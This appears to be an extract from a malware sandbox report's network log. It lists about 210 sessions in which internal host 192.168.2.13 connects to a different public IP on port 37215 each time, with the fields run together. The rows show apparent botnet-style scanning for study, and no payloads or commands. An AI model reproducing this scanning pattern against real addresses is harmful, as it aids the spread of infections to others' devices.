                                                  12081192.168.2.135125242.80.160.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12082192.168.2.1344650157.71.150.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12083192.168.2.1341134145.234.39.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12084192.168.2.135553641.199.209.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12085192.168.2.135678041.132.150.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12086192.168.2.134285658.212.12.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12087192.168.2.135998241.76.126.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12088192.168.2.134637441.125.38.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12089192.168.2.1332794129.177.21.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12090192.168.2.1351384157.255.186.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12091192.168.2.1350330108.23.95.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12092192.168.2.1353028197.172.188.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12093192.168.2.134771241.164.190.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12094192.168.2.1347404157.139.230.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12095192.168.2.1360276157.179.200.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12096192.168.2.1344610157.73.241.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12097192.168.2.133758841.1.191.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12098192.168.2.133376041.229.132.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12099192.168.2.1358206157.230.204.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12100192.168.2.134360241.228.198.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12101192.168.2.133282041.221.37.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12102192.168.2.1360466157.37.39.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12103192.168.2.1342628157.170.254.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12104192.168.2.1356580157.128.234.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12105192.168.2.135689841.71.96.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12106192.168.2.1338810197.52.182.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12107192.168.2.1349172136.134.128.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12108192.168.2.1349796157.231.199.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12109192.168.2.133864441.49.77.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12110192.168.2.1344116197.147.200.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12111192.168.2.135780241.58.45.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12112192.168.2.1351298157.177.188.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12113192.168.2.134881888.221.242.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12114192.168.2.1356692157.157.110.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12115192.168.2.135024041.247.204.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12116192.168.2.1355462157.132.17.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12117192.168.2.135660841.235.87.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12118192.168.2.1359376207.230.169.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12119192.168.2.1343166213.61.254.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12120192.168.2.134747241.238.109.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12121192.168.2.1344668197.234.183.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12122192.168.2.135479241.127.126.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12123192.168.2.1353326197.107.73.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12124192.168.2.1348468157.35.30.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12125192.168.2.1342244109.99.23.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12126192.168.2.1344632188.160.137.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12127192.168.2.1348822197.203.253.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12128192.168.2.134661241.68.128.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12129192.168.2.1333072197.139.113.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12130192.168.2.1340160197.8.30.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12131192.168.2.133845819.250.192.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12132192.168.2.134844873.116.188.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12133192.168.2.1340494157.186.222.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12134192.168.2.133601241.178.235.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12135192.168.2.1349462197.254.153.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12136192.168.2.1346528157.255.232.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12137192.168.2.1337602221.234.197.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12138192.168.2.1351366197.89.113.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12139192.168.2.1336024157.118.35.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12140192.168.2.135915041.140.167.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12141192.168.2.1347354157.19.166.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12142192.168.2.1346640142.28.123.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12143192.168.2.1338602185.102.131.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12144192.168.2.135800041.101.129.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12145192.168.2.1349590197.190.250.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12146192.168.2.1350404197.11.190.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12147192.168.2.135061441.7.219.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12148192.168.2.135383841.57.74.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12149192.168.2.1354882157.151.188.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12150192.168.2.1357638157.71.214.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12151192.168.2.134106041.41.137.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12152192.168.2.1337810197.120.17.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12153192.168.2.1341090157.229.57.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12154192.168.2.1335108157.79.56.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12155192.168.2.1340750157.224.124.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12156192.168.2.133891237.160.227.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12157192.168.2.1345782197.180.228.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12158192.168.2.1354686197.254.100.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12159192.168.2.1351626197.113.220.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12160192.168.2.135933641.126.161.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12161192.168.2.1347148157.76.210.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12162192.168.2.134430041.221.106.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12163192.168.2.1344094197.181.198.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12164192.168.2.134462641.255.223.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12165192.168.2.1353292157.244.172.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12166192.168.2.1349830157.120.217.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12167192.168.2.1336532157.197.62.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12168192.168.2.1339786197.158.134.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12169192.168.2.1351394197.65.137.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12170192.168.2.1350910157.221.63.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12171192.168.2.1359374157.63.172.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12172192.168.2.1357914157.248.242.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12173192.168.2.1337932197.87.3.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12174192.168.2.1339852111.136.85.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12175192.168.2.1360286197.118.244.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12176192.168.2.1355692157.2.79.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12177192.168.2.1341864157.127.54.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12178192.168.2.1349582157.197.104.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12179192.168.2.1351000222.53.32.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12180192.168.2.1350618185.251.236.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12181192.168.2.1360252157.243.204.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12182192.168.2.1341150197.25.236.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12183192.168.2.134240441.136.63.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12184192.168.2.133851499.158.41.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12185192.168.2.1349076157.161.28.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12186192.168.2.1333162197.177.119.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12187192.168.2.1337738157.252.180.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12188192.168.2.1359554157.112.60.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12189192.168.2.1352274141.131.156.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12190192.168.2.1333582197.162.137.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12191192.168.2.133419841.109.151.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12192192.168.2.135621664.124.217.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12193192.168.2.134807877.8.176.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12194192.168.2.1358292197.16.252.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12195192.168.2.135169041.230.50.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12196192.168.2.1348254197.50.205.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12197192.168.2.133586041.148.142.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12198192.168.2.13473381.66.153.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12199192.168.2.134599641.156.182.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12200192.168.2.1356394157.105.129.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12201192.168.2.134782441.59.233.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12202192.168.2.134331843.106.102.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12203192.168.2.134798041.113.216.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12204192.168.2.1344632157.234.253.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12205192.168.2.135475241.85.227.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12206192.168.2.1339544137.137.102.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12207192.168.2.1350540135.244.150.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12208192.168.2.1334790197.168.3.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12209192.168.2.136087441.59.38.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12210192.168.2.135654832.23.25.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12211192.168.2.1355658185.156.65.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12212192.168.2.1346118186.249.168.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12213192.168.2.134396441.223.117.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12214192.168.2.1338336197.39.63.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12215192.168.2.1340784157.38.81.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12216192.168.2.1356468197.184.0.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12217192.168.2.1355100157.224.12.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12218192.168.2.134625698.24.74.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12219192.168.2.1338548197.42.219.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12220192.168.2.1351402197.115.115.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12221192.168.2.1334654197.56.43.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12222192.168.2.13551962.50.80.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12223192.168.2.1348820197.192.73.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12224192.168.2.1334720221.164.74.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12225192.168.2.134441641.117.192.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12226192.168.2.1352800162.246.201.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12227192.168.2.13367261.238.56.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12228192.168.2.134191241.166.47.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12229192.168.2.136052841.177.110.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12230192.168.2.1349144157.35.13.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12231192.168.2.133545853.43.37.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12232192.168.2.134336025.7.117.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12233192.168.2.1359750197.178.46.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12234192.168.2.135205043.245.231.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12235192.168.2.1359354157.117.190.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12236192.168.2.1350320157.53.190.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12237192.168.2.1359078197.14.39.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12238192.168.2.1354052197.231.76.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12239192.168.2.1342698197.47.217.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12240192.168.2.1334220197.233.239.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12241192.168.2.135448274.236.77.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12242192.168.2.1354806157.129.201.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12243192.168.2.1354908197.14.134.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12244192.168.2.1336144157.38.233.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12245192.168.2.1342592220.105.33.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12246192.168.2.1338730197.32.191.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12247192.168.2.135273084.138.244.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12248192.168.2.1336188197.191.144.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12249192.168.2.1357654111.124.49.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12250192.168.2.1342842134.126.254.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12251192.168.2.1357260157.189.42.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12252192.168.2.1358962148.45.226.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12253192.168.2.1341968197.69.20.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12254192.168.2.135632641.187.99.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12255192.168.2.133714241.156.186.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12256192.168.2.135108041.164.190.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12257192.168.2.135994241.19.168.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12258192.168.2.1338758197.139.121.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12259192.168.2.1334340165.239.145.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12260192.168.2.1338060197.48.117.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12261192.168.2.133510641.136.49.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12262192.168.2.134427241.139.117.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12263192.168.2.1356240203.149.165.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12264192.168.2.135190841.22.24.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12265192.168.2.133541441.247.79.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12266192.168.2.1334738197.69.219.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12267192.168.2.13420548.197.114.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12268192.168.2.1340982178.16.103.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12269192.168.2.134780241.189.219.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12270192.168.2.1337920197.25.193.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12271192.168.2.133938041.87.64.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12272192.168.2.133929641.69.253.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12273192.168.2.134964697.40.82.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12274192.168.2.1342498197.201.148.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12275192.168.2.134939041.231.24.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12276192.168.2.133970441.14.59.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12277192.168.2.1344392197.228.65.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12278192.168.2.1341110157.139.122.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12279192.168.2.1343294157.253.154.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12280192.168.2.134946847.237.202.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12281192.168.2.1333330197.43.163.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12282192.168.2.13353089.248.40.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12283192.168.2.135038441.101.227.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12284192.168.2.1333130197.201.1.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12285192.168.2.136095081.137.62.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12286192.168.2.1340828148.58.155.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12287192.168.2.133937641.210.226.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12288192.168.2.1342418196.157.2.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12289192.168.2.1351244157.102.26.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12290192.168.2.134135841.30.149.20737215
